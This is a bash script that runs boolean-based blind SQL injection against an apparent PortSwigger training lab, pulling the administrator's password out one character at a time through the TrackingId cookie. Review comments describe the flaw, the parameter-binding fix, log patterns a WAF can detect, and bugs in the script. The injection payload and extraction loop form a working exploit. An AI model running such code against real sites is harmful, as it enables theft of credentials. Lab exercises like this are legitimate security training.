Blind SQL Injection!
#!/usr/bin/env bash
#
# Boolean-based blind SQL injection exercise against a PortSwigger Web
# Security Academy lab host (see the URL and Referer below).
#
# How it works, as far as this script shows:
#   * The request is a browser GET replayed with curl; only the TrackingId
#     cookie is modified. A SQL condition comparing one character of a
#     column value with a candidate character is appended to the cookie.
#   * A response body containing "Welcome" is taken to mean the condition
#     was true; anything else is taken as false.
#   * Positions 1..100 are walked one at a time and every candidate is
#     tried until one matches.
#
# Reading this from the defending side:
#   * NOTE(review): the server code is not shown here. The behaviour implies
#     the TrackingId cookie value is concatenated into a SQL string; binding
#     it as a query parameter removes the injection point.
#   * The page leaks one bit per request because its content differs
#     between the true and false case.
#   * Traffic shape: up to 74 near-identical GETs per position, all with the
#     same session cookie and a TrackingId containing a quote and SQL
#     keywords. That pattern is what request logs / WAF rules can key on.
#
# NOTE(review): the session cookie and the lab hostname are hard-coded in
# the request below.

# Candidate characters: a-z, A-Z, 0-9, then punctuation. '&' is listed twice.
alpha=(
  {a..z} {A..Z} {0..9}
  '(' ')' '%' '$' '@' '&' '#' '*' '&' '^' '~' '+' '_' '/'
)

# Characters found so far, in position order.
results=()

# The scan stops two entries short of the end of alpha, so the last two
# entries ('_' and '/') are never sent.
limit=$(( ${#alpha[@]} - 2 ))

for ((position = 1; position <= 100; position++)); do
  for ((slot = 0; slot < limit; slot++)); do
    candidate="${alpha[slot]}"

    # Same argument order as the captured browser request; only the Cookie
    # header varies between iterations.
    request=(
      'https://ac2e1f191ee6e67680981fd200c50090.web-security-academy.net/'
      -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0'
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
      -H 'Accept-Language: en-US,en;q=0.5'
      --compressed
      -H 'Referer: https://portswigger.net/'
      -H 'Connection: keep-alive'
      -H "Cookie: TrackingId=xaaw' OR SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), ${position}, 1) = '${candidate}; session=VkyBAyZ5d5nGU1euvjZwkkh9Pv01gmS3"
      -H 'Upgrade-Insecure-Requests: 1'
      -H 'Cache-Control: max-age=0'
      -s
    )

    # grep's exit status decides the branch (no pipefail is set), so a curl
    # transport failure is indistinguishable from a "false" answer.
    if curl "${request[@]}" | grep Welcome -q; then
      # Left unquoted as in the original: both expansions undergo word
      # splitting and pathname expansion (relevant for the '*' candidate).
      # shellcheck disable=SC2206
      results=( ${results[@]} ${candidate} )
      echo ">>>>>${results[*]}"
      break
    fi

    echo "nope"
  done
done

echo "${results[*]}"